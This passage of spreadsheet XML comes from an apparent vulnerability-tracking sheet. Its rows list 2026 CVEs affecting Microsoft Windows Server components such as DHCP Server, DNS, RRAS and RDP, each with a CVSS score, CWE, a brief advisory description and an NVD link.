          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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9" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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20" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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21" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K223" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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26" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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27" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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29" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="235">
